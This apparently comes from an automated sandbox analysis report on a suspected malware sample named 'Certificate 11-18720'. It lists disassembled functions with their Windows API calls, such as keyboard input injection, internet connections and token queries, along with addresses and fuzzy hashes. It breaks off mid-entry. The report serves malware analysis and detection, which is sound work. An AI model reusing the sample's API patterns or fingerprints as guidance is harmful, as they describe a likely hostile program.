                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: 05947de05e84f817f0dea1ffac9730daef9076d18e8c80080e834f12d8430461
                                                                                    • Instruction ID: ebd477664ee8e60eb01e9c904c9179d4c3926b47f5690fe337ffde2cf79396a2
                                                                                    • Opcode Fuzzy Hash: 05947de05e84f817f0dea1ffac9730daef9076d18e8c80080e834f12d8430461
                                                                                    • Instruction Fuzzy Hash: 0841E570AC42286AEF288B6588097FBBBBB9B55312F04015AE4C1563C1DBB48E859765
                                                                                    APIs
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0060E742
                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0060E768
                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0060E78D
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0060E7B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 3321077145-0
                                                                                    • Opcode ID: 93eaa18ece3fa34070fe5a4bf7b96d724c577a4814354f01aaa5989da01659bb
                                                                                    • Instruction ID: a901001d8a8d3913048cb7adde851d281a833a633e35db423727c8aefe915e8b
                                                                                    • Opcode Fuzzy Hash: 93eaa18ece3fa34070fe5a4bf7b96d724c577a4814354f01aaa5989da01659bb
                                                                                    • Instruction Fuzzy Hash: E6413839600651DFCF15EF54C448A4EBBE6BF99710F098899E906AB3A2CB71FD00CB91
                                                                                    APIs
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0062B5D1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 634782764-0
                                                                                    • Opcode ID: 4ce21ef6d290ffae97dee9fb06917061a8b8ce9eb3788f45792b381a8aac9fc1
                                                                                    • Instruction ID: 60ed731938c8bc765d504f3e51c6620207278b5b4bd0e67db86deba35d242b0b
                                                                                    • Opcode Fuzzy Hash: 4ce21ef6d290ffae97dee9fb06917061a8b8ce9eb3788f45792b381a8aac9fc1
                                                                                    • Instruction Fuzzy Hash: AD31E034600A25BFEF209F18EC89FE877A7EB06310F646501FA51EA2E1D730A9419F55
                                                                                    APIs
                                                                                    • ClientToScreen.USER32(?,?), ref: 0062D807
                                                                                    • GetWindowRect.USER32(?,?), ref: 0062D87D
                                                                                    • PtInRect.USER32(?,?,0062ED5A), ref: 0062D88D
                                                                                    • MessageBeep.USER32(00000000), ref: 0062D8FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1352109105-0
                                                                                    • Opcode ID: 46af32f5c9db6e3814abd13c49a400df8315044c690413d5fb58bde775cfd8b9
                                                                                    • Instruction ID: 9bc27ac8152377f2e4f920a783d63df634315c4272511f772a429da7b257a888
                                                                                    • Opcode Fuzzy Hash: 46af32f5c9db6e3814abd13c49a400df8315044c690413d5fb58bde775cfd8b9
                                                                                    • Instruction Fuzzy Hash: AF418074A00628EFCB15DF58E884BA977F7FB45311F1882A9E8549F290D734E945CF40
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00603AB8
                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00603AD4
                                                                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00603B34
                                                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00603B92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: cda91e812905917b7f4f1065765df2fa945b21d8abad62015a9b0b5e556160e1
                                                                                    • Instruction ID: 93fcf9d3916b833c786fb5018731bd776abe4127d2e2f71a835d196ed1455703
                                                                                    • Opcode Fuzzy Hash: cda91e812905917b7f4f1065765df2fa945b21d8abad62015a9b0b5e556160e1
                                                                                    • Instruction Fuzzy Hash: EA310830A80268AEEF288B64C8197FF7BAF9F6531AF04015AE481933D1CB748F45C765
                                                                                    APIs
                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005F4038
                                                                                    • __isleadbyte_l.LIBCMT ref: 005F4066
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 005F4094
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 005F40CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                    • String ID:
                                                                                    • API String ID: 3058430110-0
                                                                                    • Opcode ID: 1596618683925379a9705cb63e6e25878e6e56622c8217c88c42d91a522b74b0
                                                                                    • Instruction ID: a7651bbeddfceebb20167c9e287bafdffcfca95e1909570c3cec66d5d43d1799
                                                                                    • Opcode Fuzzy Hash: 1596618683925379a9705cb63e6e25878e6e56622c8217c88c42d91a522b74b0
                                                                                    • Instruction Fuzzy Hash: B631A13160024AEFDB219F65C848B7B7FA9BF41310F158428EB658B191EB35E890DF90
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 00627CB9
                                                                                      • Part of subcall function 00605F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00605F6F
                                                                                      • Part of subcall function 00605F55: GetCurrentThreadId.KERNEL32 ref: 00605F76
                                                                                      • Part of subcall function 00605F55: AttachThreadInput.USER32(00000000,?,0060781F), ref: 00605F7D
                                                                                    • GetCaretPos.USER32(?), ref: 00627CCA
                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00627D03
                                                                                    • GetForegroundWindow.USER32 ref: 00627D09
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                    • String ID:
                                                                                    • API String ID: 2759813231-0
                                                                                    • Opcode ID: e13fbbd5862cc2b298bce2a9290a12b342a8676fad2a35b4d9d5f911cabf375e
                                                                                    • Instruction ID: 63a8dd9482ef43d7206e3b854522613c232c79557265e5f89e8924bccc868519
                                                                                    • Opcode Fuzzy Hash: e13fbbd5862cc2b298bce2a9290a12b342a8676fad2a35b4d9d5f911cabf375e
                                                                                    • Instruction Fuzzy Hash: 1E311E75D00109AFDB10EFA9D8459EFBBF9EF94310B10846BE815E3211DA319E458FA0
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • GetCursorPos.USER32(?), ref: 0062F211
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0063E4C0,?,?,?,?,?), ref: 0062F226
                                                                                    • GetCursorPos.USER32(?), ref: 0062F270
                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0063E4C0,?,?,?), ref: 0062F2A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2864067406-0
                                                                                    • Opcode ID: c8f8a1d75494a0ff6dfd71bb9d148dca9cd151765871b3bdd8f4dc327802fae4
                                                                                    • Instruction ID: 7ef792f4735f1da244b4f066bdfbb221f3f1056e18dbeb959f77320d8de62d03
                                                                                    • Opcode Fuzzy Hash: c8f8a1d75494a0ff6dfd71bb9d148dca9cd151765871b3bdd8f4dc327802fae4
                                                                                    • Instruction Fuzzy Hash: A3219E39601428EFCB258F94E858EEE7BBAEB4B310F148079F9054B2A1D7319A51DF60
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00614358
                                                                                      • Part of subcall function 006143E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00614401
                                                                                      • Part of subcall function 006143E2: InternetCloseHandle.WININET(00000000), ref: 0061449E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1463438336-0
                                                                                    • Opcode ID: c0941f2a6d2ee0a63919183aefff48fa3e721ad45ac3301a2f3b49e566cad4a0
                                                                                    • Instruction ID: 213f1f651aac30c1e3b1ddabe8ae138a1922dc3ec3a49bc04f832716125f34d4
                                                                                    • Opcode Fuzzy Hash: c0941f2a6d2ee0a63919183aefff48fa3e721ad45ac3301a2f3b49e566cad4a0
                                                                                    • Instruction Fuzzy Hash: E021CF35600601BBEB119F619C00FFBB7ABFF88710F08401ABA2597650DB7198A1A790
                                                                                    APIs
                                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00618AE0
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00618AF2
                                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00618AFF
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00618B16
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastacceptselect
                                                                                    • String ID:
                                                                                    • API String ID: 385091864-0
                                                                                    • Opcode ID: 8b6594d23835310d6a99b8c0000b5816e2e1167ccdbafbe9799c4fa0507787f9
                                                                                    • Instruction ID: abbb94f98b64c217fb7b939e316bb9f44aedab48380fc6bb70700a1ae248b0b1
                                                                                    • Opcode Fuzzy Hash: 8b6594d23835310d6a99b8c0000b5816e2e1167ccdbafbe9799c4fa0507787f9
                                                                                    • Instruction Fuzzy Hash: 00218176A00124AFC721DF68D885ADEBBFDEF4A310F04416AF849D7290DB749E818F90
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00628AA6
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00628AC0
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00628ACE
                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00628ADC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                    • String ID:
                                                                                    • API String ID: 2169480361-0
                                                                                    • Opcode ID: 869cb681d790e144939412fd4ed6ce3658cf3e45f02fb83cfe5f56d5b5d14e66
                                                                                    • Instruction ID: 8bc140455a7c18a91fef6063743c63e6f9c689e35c5efd729469ab23713ff673
                                                                                    • Opcode Fuzzy Hash: 869cb681d790e144939412fd4ed6ce3658cf3e45f02fb83cfe5f56d5b5d14e66
                                                                                    • Instruction Fuzzy Hash: 50119335746521AFD704AB58DC09FBA77AABF85320F14411EF916C72E2CF70AC018B94
                                                                                    APIs
                                                                                      • Part of subcall function 00601E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00600ABB,?,?,?,0060187A,00000000,000000EF,00000119,?,?), ref: 00601E77
                                                                                      • Part of subcall function 00601E68: lstrcpyW.KERNEL32(00000000,?,?,00600ABB,?,?,?,0060187A,00000000,000000EF,00000119,?,?,00000000), ref: 00601E9D
                                                                                      • Part of subcall function 00601E68: lstrcmpiW.KERNEL32(00000000,?,00600ABB,?,?,?,0060187A,00000000,000000EF,00000119,?,?), ref: 00601ECE
                                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0060187A,00000000,000000EF,00000119,?,?,00000000), ref: 00600AD4
                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,0060187A,00000000,000000EF,00000119,?,?,00000000), ref: 00600AFA
                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0060187A,00000000,000000EF,00000119,?,?,00000000), ref: 00600B2E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                    • String ID: cdecl
                                                                                    • API String ID: 4031866154-3896280584
                                                                                    • Opcode ID: b95b05970037249d0aeffade86bdf2dbaa79c98d35d1ee68fb9d9b92dd23d64c
                                                                                    • Instruction ID: 6cd822b2c167b72811aafb3259d2312469695da6e5831c94bdb91e5652a41d7d
                                                                                    • Opcode Fuzzy Hash: b95b05970037249d0aeffade86bdf2dbaa79c98d35d1ee68fb9d9b92dd23d64c
                                                                                    • Instruction Fuzzy Hash: BD119A3A100305AFDB25AF24DC45EBB77AAFF45354F80406AE906CB390EB719851C7D0
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 005F2FB5
                                                                                      • Part of subcall function 005E395C: __FF_MSGBANNER.LIBCMT ref: 005E3973
                                                                                      • Part of subcall function 005E395C: __NMSG_WRITE.LIBCMT ref: 005E397A
                                                                                      • Part of subcall function 005E395C: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000001,00000000,?,?,005DF507,?,0000000E), ref: 005E399F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 614378929-0
                                                                                    • Opcode ID: 23dab1993f9768c9f0b53c4fa3f67384a08eafcab5790d63ef8fb97aa8b06cb6
                                                                                    • Instruction ID: d79f7b815152329bc19244fdc244e412cde9227fbf796f4cf78f22af65ff0fbe
                                                                                    • Opcode Fuzzy Hash: 23dab1993f9768c9f0b53c4fa3f67384a08eafcab5790d63ef8fb97aa8b06cb6
                                                                                    • Instruction Fuzzy Hash: 3811047250865BABEB263F71A80D6393F9CBF44360F205926FA8DCA151DE38CD408A90
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006005AC
                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006005C7
                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006005DD
                                                                                    • FreeLibrary.KERNEL32(?), ref: 00600632
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                    • String ID:
                                                                                    • API String ID: 3137044355-0
                                                                                    • Opcode ID: 4eb7113d189813ac688a1aff400419b6e9326389aabac579bfa20263ea46ea1a
                                                                                    • Instruction ID: cfcd3894a8cd6b0d6993df18c35820be2423e4f9f9e5a82681ef64bdf4347f78
                                                                                    • Opcode Fuzzy Hash: 4eb7113d189813ac688a1aff400419b6e9326389aabac579bfa20263ea46ea1a
                                                                                    • Instruction Fuzzy Hash: 85219A71980209EBEB258F90DC98BDBBBBAEF40700F00846DE51692190DB71EA55DF51
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00606733
                                                                                    • _memset.LIBCMT ref: 00606754
                                                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006067A6
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 006067AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                    • String ID:
                                                                                    • API String ID: 1157408455-0
                                                                                    • Opcode ID: 0801978fbf20cb34786af0a72a3e9b8a9a2c7142436f25a39234cfd1efa720af
                                                                                    • Instruction ID: b830b3fb5e6d5d8b20bf2a41e2203dbd7272f9b00b255e82e7fc211935ed98f4
                                                                                    • Opcode Fuzzy Hash: 0801978fbf20cb34786af0a72a3e9b8a9a2c7142436f25a39234cfd1efa720af
                                                                                    • Instruction Fuzzy Hash: C311CA75D412287AE7205BA5AC4DFEBBABCEF45B64F10419AF504E71D0D3744F808B64
                                                                                    APIs
                                                                                      • Part of subcall function 005FAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005FAA79
                                                                                      • Part of subcall function 005FAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005FAA83
                                                                                      • Part of subcall function 005FAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005FAA92
                                                                                      • Part of subcall function 005FAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005FAA99
                                                                                      • Part of subcall function 005FAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005FAAAF
                                                                                    • GetLengthSid.ADVAPI32(?,00000000,005FADE4,?,?), ref: 005FB21B
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005FB227
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 005FB22E
                                                                                    • CopySid.ADVAPI32(?,00000000,?), ref: 005FB247
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                    • String ID:
                                                                                    • API String ID: 4217664535-0
                                                                                    • Opcode ID: 68ebddb9aad6f9232e171489c65b4b59263dbdf15725baf7ff632be40793937e
                                                                                    • Instruction ID: e9ff7e569da4647baef2682ac7c4b589b0d00edd033cc021d19c47e5838cc2b8
                                                                                    • Opcode Fuzzy Hash: 68ebddb9aad6f9232e171489c65b4b59263dbdf15725baf7ff632be40793937e
                                                                                    • Instruction Fuzzy Hash: 98119479A00209EFDB149F54DC95ABEBBAAFF85304F14942DEA4297211D7359E44CB10
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 005FB498
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005FB4AA
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005FB4C0
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 005FB4DB
                                                                                    Memory Dump Source
